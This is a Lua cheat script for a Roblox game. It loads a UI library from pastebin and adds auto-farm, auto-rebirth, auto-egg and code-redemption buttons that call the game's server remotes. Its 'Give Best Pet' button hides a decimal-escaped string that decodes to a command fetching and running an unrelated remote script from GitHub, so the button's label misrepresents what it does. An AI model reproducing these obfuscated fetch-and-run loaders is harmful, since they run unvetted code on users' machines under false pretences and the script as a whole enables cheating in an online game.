local library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local window = library.CreateLib("Made by Novaz#5792, Modded by PurpleApple#9562", _G.Theme)
local main = window:NewTab("Auto Farm")
local section = main:NewSection("Auto Farm")
local toggles = {}
local plr = game.Players.LocalPlayer
local cha = plr.Character
local hrp = cha.HumanoidRootPart

section:NewButton("Redeem Codes", "", function()
  local args = {[1] = {[1] = "FREESTRENGTH"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "HELL"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "HEAVEN"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "BELUGA"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "VOID"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "ANIME"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "FREELUCK"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
  wait()
  local args = {[1] = {[1] = "ILIKEGEMS"}}
  game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_redeemcode:InvokeServer(unpack(args))
end)

section:NewToggle("Auto Attack", "", function(a)
  b = a
  while b and wait(0.0001) do
    for i,v in pairs(game.Players.LocalPlayer.Character:GetDescendants()) do
      if v:IsA("Tool") then
        v:Activate()
      end
    end
  end
end)

section:NewToggle("Auto Rebirth", "", function(lor)
  por = lor
  while por and task.wait() do
    game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_rebirth:InvokeServer({})
    plr.PlayerGui.Main:FindFirstChild("Rebirth").Visible = false
  end
end)

section:NewToggle("Auto Egg", "", function(lpr)
  lit = lpr
  while lit and task.wait() do
    local args = {
      [1] = {
        [1] = p
      }
    }
    game:GetService("ReplicatedStorage").Framework.Modules.Shared.Internal.Modules:FindFirstChild("2 | Network").Remotes.s_controller_buyegg:InvokeServer(unpack(args))
  end
end)

section:NewDropdown("Select Egg", "", {"Beach Egg", "Forest Egg", "Dominus Egg", "Dragon Egg", "Alien Egg", "Arctic Egg", "Zomie Egg", "Hell Egg", "Heaven Egg"}, function(l)
  p = l
end)

section:NewButton("Give Best Pet", "Made by PurpleApple. Automatically gives best pet", function()
  loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\115\99\114\101\101\110\103\117\105\47\115\105\100\101\115\99\114\105\112\116\115\47\109\97\105\110\47\115\104\105\116\97\115\115\37\50\48\102\101\37\50\48\115\99\114\105\112\116\34\44\116\114\117\101\41\41\40\41\10")()
end)
